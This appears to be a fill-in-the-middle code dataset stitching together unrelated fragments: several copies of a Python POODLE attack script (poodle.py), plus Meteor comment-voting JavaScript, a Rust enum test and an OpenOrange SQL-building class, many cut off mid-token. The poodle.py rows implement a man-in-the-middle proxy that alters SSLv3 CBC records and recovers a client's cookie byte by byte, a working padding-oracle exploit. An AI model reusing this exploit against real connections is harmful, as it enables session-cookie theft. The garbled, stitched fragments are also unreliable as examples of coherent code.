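# P_i[-1] = C_{i-1}[-1] XOR C_{n-2}[-1] XOR (block_len - 1)
# prev_block:           ciphertext block preceding the targeted block C_i
# second_to_last_block: block that precedes the final padding position the
#                       targeted block was copied into
def recover_byte(prev_block: bytes, second_to_last_block: bytes, block_len: int) -> int:
    return prev_block[-1] ^ second_to_last_block[-1] ^ (block_len - 1)

# Hypothetical values, for illustration only:
print(hex(recover_byte(bytes([0x3A] * 8), bytes([0x51] * 8), 8)))  # 0x3a ^ 0x51 ^ 0x07
```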
poodle.py | , port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server.
Inform the attacker about the client's frames and the server's responses.
Finally, relay the data from the client to the server and vice versa.
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str(self.frame)
return self.frame
def set_decipherable(self, status):
self.decipherable = status
return
def set_length_frame(self, data):
self.frame = data
self.length_frame = len(data)
def | client_connection | identifier_name |
|
poodle.py | self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on its host and port, waiting for the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server.
Inform the attacker about the client's frames and the server's responses.
Finally, relay the data from the client to the server and vice versa.
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return |
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str |
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block] | random_line_split |
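`size_of_block` in the rows above infers the CBC block size by sending a baseline request and then growing the path one byte at a time until the ciphertext length jumps; the size of the jump is the block size, and the number of added bytes tells the attacker how much prefix aligns the secret on a block boundary. A sketch with a fake length oracle standing in for the observed TLS record length; the overhead value is hypothetical.

```python
# Fake oracle: ciphertext length = payload + MAC overhead, padded to a block.
def ciphertext_len(payload_len: int, block: int = 8, overhead: int = 20) -> int:
    total = payload_len + overhead
    return total + (block - total % block)    # SSLv3 always adds 1..block pad bytes

def find_block_size():
    reference = ciphertext_len(0)
    extra = 0
    while True:
        extra += 1
        delta = ciphertext_len(extra) - reference
        if delta:
            return delta, extra               # (block size, prefix bytes to align)

print(find_block_size())                      # -> (8, 4) with these numbers
```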
poodle.py | self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on its host and port, waiting for the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server.
Inform the attacker about the client's frames and the server's responses.
Finally, relay the data from the client to the server and vice versa.
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
| return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str | """ Acts as a MitM proxy:
serves on its host and port and redirects the data to the server through this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown() | identifier_body |
comment.js | Template.comment.helpers({
submittedText: function() {
var date = new Date(this.submitted);
console.log("vote =====>", this);
var d=date.getDate();
var m=date.getMonth()+1;
var y=date.getFullYear();
return m + " - " + d + " - " + y;
},
postID : function(postID){
this.postID = postID;
return postID;
},
up: function(){
var userId = Meteor.userId();
if (userId && _.include(this.upvoters, userId)) {
return true;
} else{
return false;
}
},
down: function(){
var userId = Meteor.userId();
if (userId && _.include(this.downvoters, userId)) {
return true;
}else{
return false;
}
},
// we will have to edit this function
upvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.upvoters, userId) || _.include(this.downvoters, userId) ) ) | else {
return 'disabled';
}
},
downvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.downvoters, userId) || _.include(this.upvoters, userId) ) ) {
return 'downvotable';
} else {
return 'disabled';
}
},
});
Template.comment.events({
'click .upvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('upvoteComment', this._id, postID);
},
'click .downvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('downvoteComment', this._id, postID);
},
'click .translatable': function(e,t) {
var curTarget = $(e.currentTarget),
srcTxt = this.body,
srcLang = 'en',
tarLang = 'de';
Meteor.call('getTranslation', srcTxt, srcLang, tarLang, function(err, res){
if (res.error) {console.log("err", res.message); curTarget.closest('div.row').find('.translated-text').text('(' + "sorry, something went wrong" + ')');}
else curTarget.closest('div.row').find('.translated-text').text('(' + res.message + ')');
});
}
});
| {
return 'upvotable';
} | conditional_block |
comment.js | Template.comment.helpers({
submittedText: function() {
var date = new Date(this.submitted);
console.log("vote =====>", this);
var d=date.getDate();
var m=date.getMonth()+1;
var y=date.getFullYear();
return m + " - " + d + " - " + y;
},
postID : function(postID){
this.postID = postID;
return postID;
},
up: function(){
var userId = Meteor.userId();
if (userId && _.include(this.upvoters, userId)) {
return true;
} else{
return false;
}
},
down: function(){
var userId = Meteor.userId();
if (userId && _.include(this.downvoters, userId)) {
return true;
}else{
return false;
}
},
// we will have to edit this function
upvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.upvoters, userId) || _.include(this.downvoters, userId) ) ) {
return 'upvotable';
} else {
return 'disabled';
}
},
downvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.downvoters, userId) || _.include(this.upvoters, userId) ) ) {
return 'downvotable';
} else {
return 'disabled';
}
},
});
Template.comment.events({
'click .upvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('upvoteComment', this._id, postID);
},
'click .downvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('downvoteComment', this._id, postID);
},
'click .translatable': function(e,t) {
var curTarget = $(e.currentTarget),
srcTxt = this.body,
srcLang = 'en',
tarLang = 'de';
Meteor.call('getTranslation', srcTxt, srcLang, tarLang, function(err, res){
if (res.error) {console.log("err", res.message); curTarget.closest('div.row').find('.translated-text').text('(' + "sorry, something went wrong" + ')');}
else curTarget.closest('div.row').find('.translated-text').text('(' + res.message + ')');
});
} | }); | random_line_split |
|
const-enum-vector.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
enum | { V1(int), V0 }
static C: [E; 3] = [E::V0, E::V1(0xDEADBEE), E::V0];
pub fn main() {
match C[1] {
E::V1(n) => assert!(n == 0xDEADBEE),
_ => panic!()
}
match C[2] {
E::V0 => (),
_ => panic!()
}
}
| E | identifier_name |
const-enum-vector.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at | // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
enum E { V1(int), V0 }
static C: [E; 3] = [E::V0, E::V1(0xDEADBEE), E::V0];
pub fn main() {
match C[1] {
E::V1(n) => assert!(n == 0xDEADBEE),
_ => panic!()
}
match C[2] {
E::V0 => (),
_ => panic!()
}
} | // http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or | random_line_split |
const-enum-vector.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
enum E { V1(int), V0 }
static C: [E; 3] = [E::V0, E::V1(0xDEADBEE), E::V0];
pub fn main() | {
match C[1] {
E::V1(n) => assert!(n == 0xDEADBEE),
_ => panic!()
}
match C[2] {
E::V0 => (),
_ => panic!()
}
} | identifier_body |
|
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status
x = "'%s' as test_date\n, " % date("")
x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def getExtra3(self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis)
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
|
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList)
| txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt | identifier_body |
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status
x = "'%s' as test_date\n, " % date("")
x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
